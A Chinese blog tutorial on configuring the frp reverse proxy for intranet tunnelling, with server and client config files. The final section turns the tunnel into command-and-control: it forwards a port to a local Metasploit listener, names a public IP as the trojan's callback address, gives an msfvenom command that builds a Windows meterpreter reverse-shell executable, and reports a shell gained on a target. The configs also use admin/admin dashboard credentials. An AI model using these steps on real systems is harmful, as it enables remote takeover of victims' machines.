赞
踩
frp是一个高性能的反向代理应用,可以帮助您轻松地进行内网穿透,对外网提供服务, 支持tcp, udp, http,https等协议类型,并且web服务支持根据域名进行路由转发。
两台不同内网的机器,是没有办法直接进行访问的,通过配置frp内网穿透,可以实现将2台不同内网的机器实现互联
一定要有一个公网的ip,去买个云服务器就行,企鹅云的服务器现在新用户也就65一个月
https://github.com/fatedier/frp/releases
根据不同的系统需求,下载不同的frp版本就行,linux就下载如下图所示的版本
将下载好后的frp文件上传到服务器,使用如下命令解压
tar -zxvf frp_0.44.0_linux_amd64.tar.gz
之后使用cd命令进入解压之后的文件夹
cd frp_0.44.0_linux_amd64/
使用vim frps.ini命令进入编辑模式,写入如下信息
[common] # frp监听的端口,默认是7000 bind_port = 7000 # 授权码 token =aini123 # 这个token之后在客户端会用到 # frp管理后台端口 dashboard_port = 8000 # frp管理后台用户名和密码 dashboard_user = admin dashboard_pwd = admin enable_prometheus = true # frp日志配置 log_file = /var/log/frps.log log_level = info log_max_days = 3
配置完成后如下图
启动frp服务
./frps -c ./frps.ini
启动成功如下图
之后输入服务端ip:8000能出现如下页面,就说明配置完成了
同上方法,在客户端上传解压文件,进入解压的文件夹
使用vim frpc.ini 编辑客户端配置文件,内容如下
# 客户端配置 [common] server_addr = 服务器的ip # 与frps.ini的bind_port一致 server_port = 7000 # 与frps.ini的token一致 token =aini123 # 配置msf服务 [msf] type = tcp local_ip = 127.0.0.1 local_port = 5555 #转发给本机的 5555 本地msf监听127.0.0.1:5555端口 remote_port = 6000 #服务端用 6000 端口转发给本机 #木马程序的shell返回地址应该是175.24.230.65:6000,然后服务器会将6000的值转发给本地5555端口 # 配置ssh服务 [ssh] type = tcp local_ip =127.0.0.1 local_port =22 remote_port =6001
配置好后如下图:
使用./frpc -c ./frpc.ini
命令启动客户端,会出现如下连接成功的显示,如果连接失败,记得注释不要和配置代码放同一行就不会报错了
因为前面设置的ssh连接remote_port转发端口为6001,所以我们只需要连接外网服务器的6001端口,就能连接上客户端的ssh
连接成功
msf制作一个反弹木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=公网ip lport=6000 --platform win -f exe -o msf.exe
msf设置监听5555端口
靶机打开反弹连接的木马,成功获取shell
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。